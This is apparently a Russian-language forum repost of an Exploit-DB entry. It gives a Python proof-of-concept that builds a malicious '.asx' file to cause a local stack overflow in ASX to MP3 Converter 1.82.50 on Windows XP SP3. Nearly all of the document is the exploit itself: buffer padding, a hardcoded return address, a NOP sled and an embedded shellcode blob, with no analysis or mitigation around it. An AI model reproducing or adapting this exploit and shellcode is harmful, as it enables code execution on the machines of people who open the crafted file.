Exploit ASX to MP3 Converter 1.82.50 (Windows XP SP3) - '.asx' Local Stack Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38382
Проверка EDB
  1. Пройдено
Автор
EX_PTR
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
N/A
Дата публикации
2015-10-02
ASX to MP3 Converter 1.82.50 (Windows XP SP3) - '.asx' Local Stack Overflow
Код:
'''
# Exploit Title: ASX to MP3 Converter 1.82.50 Stack Overflow
# Date: 2 Oct 2015
# Exploit Author: ex_ptr
# Vendor Homepage: http://mini-stream.net
# Version: 1.82.50
# Tested on: Windows XP SP3
'''

import struct
filename = "exploit.asx"

dummy = "A"*0x104
EIP   = struct.pack('<I', 0x76af3adc)
FFFF  = "\xFF\xFF\xFF\xFF"
NOP   = "\x90"*4
Shell = ("\x31\xc9\xbd\x90\xb7\x29\xb8\xd9\xf7\xd9\x74\x24\xf4\xb1\x1e"
		 "\x58\x31\x68\x11\x03\x68\x11\x83\xe8\x6c\x55\xdc\x44\x64\xde"
		 "\x1f\xb5\x74\x54\x5a\x89\xff\x16\x60\x89\xfe\x09\xe1\x26\x18"
		 "\x5d\xa9\x98\x19\x8a\x1f\x52\x2d\xc7\xa1\x8a\x7c\x17\x38\xfe"
		 "\xfa\x57\x4f\xf8\xc3\x92\xbd\x07\x01\xc9\x4a\x3c\xd1\x2a\xb7"
		 "\x36\x3c\xb9\xe8\x9c\xbf\x55\x70\x56\xb3\xe2\xf6\x37\xd7\xf5"
		 "\xe3\x43\xfb\x7e\xf2\xb8\x8a\xdd\xd1\x3a\x4f\x82\x28\xb5\x2f"
		 "\x6b\x2f\xb2\xe9\xa3\x24\x84\xf9\x48\x4a\x19\xac\xc4\xc3\x29"
		 "\x27\x22\x90\xea\x5d\x83\xff\x94\x79\xc1\x73\x01\xe1\xf8\xfe"
		 "\xdf\x46\xfa\x18\xbc\x09\x68\x84\x43")

exploit = dummy + EIP + FFFF + NOP + Shell

f = open(filename,'wb')
f.write(exploit)
f.close()
 
Источник
www.exploit-db.com

Похожие темы